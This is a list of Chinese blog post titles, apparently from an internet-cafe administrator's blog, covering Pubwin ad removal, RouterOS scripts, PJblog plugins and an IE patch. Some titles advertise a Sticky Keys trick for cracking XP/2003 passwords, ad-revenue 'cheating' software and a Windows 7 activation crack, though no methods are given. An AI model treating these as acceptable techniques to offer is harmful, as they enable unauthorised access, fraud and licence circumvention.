杀死Pubwin随机广告进程(AU3+批处理)

常用ROS脚本——持续收集ING

用粘滞键破解XP/2003密码

网吧主页联盟增值作弊软件(兼容大部分增值主页搜索)

解决易游强制安装的百度地址栏软件

PJblog的滚动公告插件代码

PJblog的Ping服务

清爽网吧留言板

十年QQ；十年回顾

自动折叠易游菜单广告

AU3所有UDF全汉化下载

做原创很难，但还是要坚持

Pubwin非法检测软件(网吧收银守护神) by 流星无语

MS10-002:“极光”IE漏洞补丁

SuperOem7 V2 Win7激活 NT6正版体验最好用的激活程序